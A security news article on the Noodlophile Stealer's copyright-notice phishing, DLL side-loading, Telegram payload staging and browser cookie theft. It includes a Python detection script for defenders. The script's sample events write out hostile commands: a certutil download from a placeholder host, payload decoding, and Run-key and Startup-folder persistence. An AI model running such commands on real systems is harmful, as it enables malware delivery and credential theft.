The Noodlophile Stealer, a malware family first exposed when it was distributed through fake AI video-generation platforms, has resurfaced with new tactics. According to Morphisec, “the Noodlophile Stealer… has evolved into a highly targeted threat exploiting enterprises with significant Facebook footprints.”
This upgraded campaign blends sophisticated spear phishing with advanced malware staging and enhanced data theft capabilities, marking a dangerous step forward in the threat actor’s arsenal.
Phishing campaigns exploiting copyright infringement claims are not new, but this campaign elevates the approach. The report explains: “The Noodlophile campaign… now leverages advanced spear phishing emails posing as copyright infringement notices, tailored with reconnaissance-derived details like specific Facebook Page IDs and company ownership information.”
The emails, often originating from Gmail accounts to evade suspicion, carry legal threats and urgent calls to action. Victims are lured with links disguised as evidence files — such as “View Copyright Infringement Evidence.pdf” — and localized in multiple languages (English, Spanish, Polish, Latvian), likely with the help of AI.
Unlike earlier campaigns, the updated Noodlophile variant uses legitimate, signed applications vulnerable to DLL side-loading. Morphisec highlights that attackers exploited Haihaisoft PDF Reader and Excel converters, leveraging two main techniques:
- “Recursive Stub Loading” – a small stub DLL loads additional malicious DLLs via Import Address Table dependencies.
- “Chained DLL Vulnerabilities” – malicious code executes covertly through legitimate DLLs with their own side-loading flaws.
Payloads are delivered through Dropbox archives masked by TinyURL or other redirectors, with disguised batch scripts posing as .docx or .png files.
A notable innovation in this campaign is the use of Telegram for payload staging. The analysis reveals: “These scripts extract a URL from the description of a Telegram group, enabling dynamic execution of the payload.”
The final stealer is often hosted on free platforms like paste[.]rs, with heavy obfuscation and in-memory execution to evade traditional detection methods. Combined with LOLBin abuse (such as certutil.exe), the malware achieves stealth and persistence.
Morphisec’s code analysis uncovered unimplemented functions that point to rapid evolution. The report notes placeholders for screenshot capture, keylogging, file exfiltration, process monitoring, network reconnaissance, file encryption, and browser history extraction.
Currently, the stealer zeroes in on browser data, especially Facebook-related information. It “extracts Web Data, AutoFills, and cookies, with a special emphasis on cookies.sqlite for stealing Facebook cookies.” In addition, it retrieves saved credit card details, enumerates antivirus software, and gathers system information.
Persistence is established via registry entries and the Programs\Startup directory, while self-deletion techniques help cover its tracks.
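The LOLBin, disguised-script and persistence behaviours described above can be turned into simple endpoint hunting rules. The following is an added Python example (not code from Morphisec or the report) that runs three heuristics over constructed Sysmon-style process-creation events; the exact Run-key path and the `.docx.bat` form of the disguised scripts are assumptions, since the article names only "registry entries" and scripts "posing as .docx or .png files".

```python
import re

# Constructed Sysmon-style process-creation events (not telemetry from the report).
# They mix the tradecraft described in the article with benign look-alikes.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -urlcache -split -f https://redirector.example/q C:\Users\Public\p.tmp"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"certutil.exe -decode C:\Users\Public\p.tmp C:\Users\Public\p.exe"},
    {"image": r"C:\Windows\System32\certutil.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},  # benign certutil use
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\victim\Downloads\Evidence.docx.bat"'},
    {"image": r"C:\Windows\System32\reg.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Upd /d C:\Users\Public\p.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Users\Public\p.exe",
     "cmdline": r'cmd.exe /c copy p.exe "C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\p.exe"'},
    {"image": r"C:\Program Files\Office\WINWORD.EXE", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\victim\Downloads\report.docx"'},  # benign document open
]

# (rule name, predicate). The patterns are heuristics written for this example,
# not indicators taken from the report.
RULES = [
    # certutil used to fetch or decode a payload rather than for certificate work
    ("certutil_download_or_decode",
     lambda e: e["image"].lower().endswith(r"\certutil.exe")
     and re.search(r"(?i)[-/](urlcache|decode)\b", e["cmdline"]) is not None),
    # assumed shape of the disguise: a batch file carrying a document/image decoy extension
    ("script_with_document_decoy_extension",
     lambda e: re.search(r"(?i)\.(docx|png)\.(bat|cmd)\b", e["cmdline"]) is not None),
    # assumed Run key plus the Programs\Startup folder named in the article
    ("startup_persistence",
     lambda e: re.search(r"(?i)\\CurrentVersion\\Run\b|\\Programs\\Startup\\", e["cmdline"]) is not None),
]


def detect(events):
    """Return [(rule_name, cmdline)] for every event that trips a rule."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if pred(e):
                hits.append((name, e["cmdline"]))
    return hits


if __name__ == "__main__":
    for name, cmd in detect(SAMPLE_EVENTS):
        print(f"{name:40} {cmd}")
```

The two benign events (a certificate verification and a normal Word document open) are deliberately included to show the rules do not fire on ordinary certutil or .docx activity.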
The Noodlophile Stealer’s evolution into copyright phishing attacks highlights how attackers weaponize brand reputation risks against enterprises. Security leaders should strengthen phishing defenses, monitor for DLL side-loading activity, and remain vigilant against Telegram-based staging.